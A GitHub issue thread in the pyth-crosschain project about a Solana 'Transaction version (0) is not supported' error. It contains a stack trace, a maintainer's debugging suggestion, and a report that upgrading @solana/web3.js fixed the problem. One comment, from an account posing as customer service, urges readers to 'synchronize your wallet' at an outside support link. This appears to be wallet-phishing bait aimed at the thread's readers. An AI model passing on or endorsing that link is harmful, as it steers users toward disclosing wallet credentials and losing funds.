### ISSUE TITLE
Transaction version (0) is not supported by the requesting client, set maxSupportedTransactionVersion

### ISSUE THREAD

**Issue by kskalski** [pyth-network/pyth-crosschain#2148]
This is probably due to old anchor dependency used by `@pythnetwork/pyth-solana-receiver`
```
node_modules/@solana/web3.js/src/connection.ts:5069
      throw new SolanaJSONRPCError(res.error, 'failed to get transaction');
            ^

SolanaJSONRPCError: failed to get transaction: Transaction version (0) is not supported by the requesting client. Please try the request again with the following configuration parameter: "maxSupportedTransactionVersion": 0
    at Connection.getTransaction (node_modules/@solana/web3.js/src/connection.ts:5069:13)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at AnchorProvider.sendAll (node_modules/@pythnetwork/pyth-solana-receiver/node_modules/@coral-xyz/anchor/src/provider.ts:256:28)
    at <anonymous> (pythPush.ts:63:5) {
  code: -32015,
  data: undefined
}

```

**Comment by guibescos** [comment]
I've seen this error before, and never understood how to fix it.

To validate your hypothesis that this is due to an outdated anchor dependency, could you try dispatching the transaction using some anchor-less logic like https://github.com/pyth-network/pyth-crosschain/blob/main/target_chains/solana/sdk/js/solana_utils/src/transaction.ts#L416.

**Comment by AlexLiveBot11549** [comment]
Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/

**Comment by 0xYudhishthra** [comment]
I faced this same error yesterday, and after upgrading `@solana/web3.js` to `^1.98.0`, it seemed to have fix this issue
